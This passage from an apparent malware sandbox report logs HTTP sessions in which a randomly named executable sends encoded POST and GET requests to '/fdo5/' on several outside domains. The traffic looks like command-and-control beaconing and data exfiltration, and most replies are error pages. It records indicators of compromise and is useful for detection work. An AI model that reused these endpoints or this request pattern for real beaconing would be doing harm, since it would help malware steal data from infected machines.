                                                                                              Data Ascii: 540H2x=l7Yypln1j4ZRi8JehEydqq3YxFtMgWGwQRkMltLAG5uABWfE9LM4wnrsZmOR1cuD2cE5KQbu7sUmQy/UDA1SxRD6cR9iYKb7BKBIWS4nyyf5IwCEXgNWgTRF05aqcl0I/do1TdxPbR2QClrXhNr+2TQJ7SqHxxYIdlRbShlVxX0khRgfB6iQpuo9DHSVhxk7yAUx01A=
Dec 3, 2023 16:27:01.607656002 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:27:01 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4857
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Dec 3, 2023 16:27:01.607826948 CET | 1340 | IN
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Dec 3, 2023 16:27:01.607875109 CET | 1340 | IN
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Dec 3, 2023 16:27:01.607891083 CET | 1271 | IN
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49755 | 52.68.224.126 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:04.133094072 CET | 7770 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.busan3-200.com
                                                                                              Referer: http://www.busan3-200.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:27:04.399122000 CET | 3110 | OUT
Dec 3, 2023 16:27:04.665920019 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:27:04 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4857
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Dec 3, 2023 16:27:04.665935993 CET | 1340 | IN
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Dec 3, 2023 16:27:04.665949106 CET | 1340 | IN
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Dec 3, 2023 16:27:04.665966034 CET | 1271 | IN
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49756 | 52.68.224.126 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:06.930078983 CET | 461 | OUT | GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ== HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:27:07.195202112 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:27:07 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4990
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Dec 3, 2023 16:27:07.195293903 CET | 1340 | IN
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Dec 3, 2023 16:27:07.195308924 CET | 1340 | IN
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Dec 3, 2023 16:27:07.195322037 CET | 1340 | IN
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000
Dec 3, 2023 16:27:07.459630966 CET | 118 | IN
                                                                                              Data Ascii: o;</a></p> </fieldset> </div> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49757 | 37.97.254.27 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:13.130539894 CET | 739 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.wrautomotive.online
                                                                                              Referer: http://www.wrautomotive.online/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=gkBnDzjFAfq2KervV9t95gAEW3mwDzPRMX7VQ4etmXJZmIug5va4VvlWHBlGQ8wBXmWrWL9IkcQinFrfMcCsJPUCdEfY3ejxTEYhZUyqVMnsBZOsmSARliX4VYYXZQgwcSm3UElB6t5RnPnuIuMqZmINOiaR4ppdFEzXEHzqOH9XOSvz6Q==
Dec 3, 2023 16:27:13.316773891 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49758 | 37.97.254.27 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:15.847098112 CET | 759 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.wrautomotive.online
                                                                                              Referer: http://www.wrautomotive.online/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=gkBnDzjFAfq2K+7vWaZ9+AAHT3mwNTPdMXnVQ5q9lhRZlpeg4ua4UvlWexlDNsw0XmajWOFIkcEinHjfMvqjK/UXG0fa6+jxTEYhZUnHVM/sBpesmwoQ6SX7SYYXdQgrcSmRUGBr6vBRnNPuGckpC2ILQSbD/LIvGnCpVGXQNxI5GnDg9lJ9yH3JjOhH/hdvtVeOdik=
Dec 3, 2023 16:27:16.031387091 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49759 | 37.97.254.27 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:18.550590038 CET | 10841 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.wrautomotive.online
                                                                                              Referer: http://www.wrautomotive.online/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:27:18.737098932 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49760 | 37.97.254.27 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:21.256906033 CET | 466 | OUT | GET /fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1
                                                                                              Host: www.wrautomotive.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:27:21.443629026 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                              Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                                              Server: Apache
                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Type: text/html
                                                                                              Cache-Control: max-age=31536000
                                                                                              X-Varnish: 634803469 3
                                                                                              Age: 6471070
                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 64668
                                                                                              Connection: close
                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
Dec 3, 2023 16:27:21.443692923 CET | 1340 | IN
                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="
Dec 3, 2023 16:27:21.443732977 CET | 1340 | IN
                                                                                              Data Ascii: 2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
Dec 3, 2023 16:27:21.443772078 CET | 1340 | IN
                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
Dec 3, 2023 16:27:21.443813086 CET | 1340 | IN
                                                                                              Data Ascii: ved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <pa
Dec 3, 2023 16:27:21.443851948 CET | 1340 | IN
                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-p
Dec 3, 2023 16:27:21.443892002 CET | 1340 | IN
                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
Dec 3, 2023 16:27:21.443933010 CET | 1340 | IN
                                                                                              Data Ascii: href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width="1
Dec 3, 2023 16:27:21.443994045 CET | 1340 | IN
                                                                                              Data Ascii: h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g><
                                                                                              Dec 3, 2023 16:27:21.444034100 CET1340INData Raw: 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: 25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-4.
                                                                                              Dec 3, 2023 16:27:21.628475904 CET1340INData Raw: 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c 30 63
                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,4.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49761 | 172.67.184.73 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:35.987390995 CET | 712 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.poria.link
                                                                                              Referer: http://www.poria.link/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=8YeQZ43WYyzQRlm0Lsvn9DTIj2KZaS5xILLfO1ql+kyrwUbT8eEC2/qkge+fx7crdBf6/ORWctCyyyLpHwqM8IJ8STWDFt86nQfSp0GdYSLYjz2WM80EGBASsmpCRjy9cGnXyRpFcQC1JZVnowvZPXYO3wfsVPOZL4C16o43n6fXDE4mFA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49762 | 172.67.184.73 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:38.636346102 CET | 732 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.poria.link
                                                                                              Referer: http://www.poria.link/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=8YeQZ43WYyzQRFW0HvHnszTJtWKZUy59ILHfO0e1+WmrwxnT7csC1/qky++Q+bcgdBTI/KRWctmyyybpAHeD8YJEezWFYd86nQfSp0DyYWnYjDGWNZYbMhARrmpCGzyxcGn1yQ1vcVe1JbdnrlbaGXYI4QeNF8SQL4XK9e0Ii+q6CRU1Cy5Q2PbcePJ/PmPgci5PMcE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49763 | 172.67.184.73 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:41.291620016 CET | 10814 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.poria.link
                                                                                              Referer: http://www.poria.link/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49764 | 172.67.184.73 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:27:43.947745085 CET | 457 | OUT | GET /fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:28:15.077565908 CET | 806 | IN | HTTP/1.1 522
                                                                                              Date: Sun, 03 Dec 2023 15:28:14 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 15
                                                                                              Connection: close
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gF28OXec0uz5xY%2BY8aGIzCd10nhOgWxIMhZPwTgCnAl5L83bw47cAAerrsYKVTgtvFAeDhJy%2BoFvtS9yz0oUTqldH1biOuDqJSTOvELLd8Xs6BVePvLW6wiTnF71siJYiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Referrer-Policy: same-origin
                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 82fcd5dbf8e58260-IAD
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              Data Ascii: error code: 522


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49765 | 202.172.28.202 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:28:20.956779003 CET | 727 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.kasegitai.tokyo
                                                                                              Referer: http://www.kasegitai.tokyo/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=JSYzEfPQOV52Rwd6YegUV8q9Em7nIsIUwYA0tfFhb4D1qlLHBuAiz2IO2J+xSB02yJUQcH2GKnhN3tQpR4DHn4bMlNW+hOIb0I9IJtXlRi+OoD0AU7fttaR5CNmy5HVGGSidB/3NN/i4Hm2BdqkttPqRY6e59oHEbtTp4pm5QyUmgAKzmg==
Dec 3, 2023 16:28:21.231065989 CET | 414 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:21 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
